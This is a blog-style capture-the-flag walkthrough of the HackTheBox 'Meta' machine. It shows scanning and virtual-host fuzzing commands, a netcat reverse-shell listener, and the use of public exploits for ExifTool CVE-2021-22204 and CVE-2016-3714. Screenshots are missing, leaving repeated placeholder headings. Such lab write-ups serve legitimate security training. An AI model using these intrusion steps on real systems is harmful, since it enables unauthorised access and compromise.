HackTheBox Meta
Posted in: Hack The Box

HackTheBox Meta WriteUp

Today I decide to create the HackTheBox Meta WriteUp, is a medium machine running Linux released on 22 Jan 2022.

sudo rustscan -a 10.129.17.37 --

I’ve started scanning the machine using rustscan and detect two open ports, 22 and 80

HackTheBox Meta WriteUp

Port 22 is running SSH I move on and start scanning port 80.

HackTheBox Meta WriteUp

HackTheBox Meta WriteUp
port 80

On port 80 we have a webserver and we can notice the domain used on title tag and add it to the /etc/hosts file.

echo '10.129.17.37  artcorp.htb' >> /etc/hosts

On the index page we have a simple website, and I found nothing investigating the source code.

HackTheBox Meta WriteUp
HackTheBox Meta WriteUp 14

Search Directories on Port 80

Searching for new directories result

dirsearch -u http://artcorp.htb
HackTheBox Meta WriteUp

Enumerate Virtual Hosts

wfuzz -c -f subdomains.txt -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://artcorp.htb/" -H "Host: FUZZ.artcorp.htb" --hl 154
HackTheBox Meta WriteUp
open http://dev01.artcorp.htb/metaview/
HackTheBox Meta WriteUp

Get a Reverse Shell – CVE-2021-22204

After spending more than 20m thinking and analyzing the the page I notice the answer was in front of me! Metadata!

git clone https://github.com/convisolabs/CVE-2021-22204-exiftool.git
sudo apt install djvulibre-bin exiftool
HackTheBox Meta WriteUp

Edit the exploit.py file and add your IP and Port from your listener.

HackTheBox Meta WriteUp

Start your listener and run the exploit

rlwrap -cAr nc -lvnp 4430
python3 exploit.py

Escalate Privileges to User

https://github.com/Hood3dRob1n/CVE-2016-3714
HackTheBox Meta WriteUp

Escalate Privileges to R00t

HackTheBox Meta WriteUp

$XDG_CONFIG_HOME defines the base directory relative to which user-specific configuration files should be stored.

Description
HackTheBox Meta WriteUp

HackTheBox Meta Writeup!

Leave a Reply

Back to Top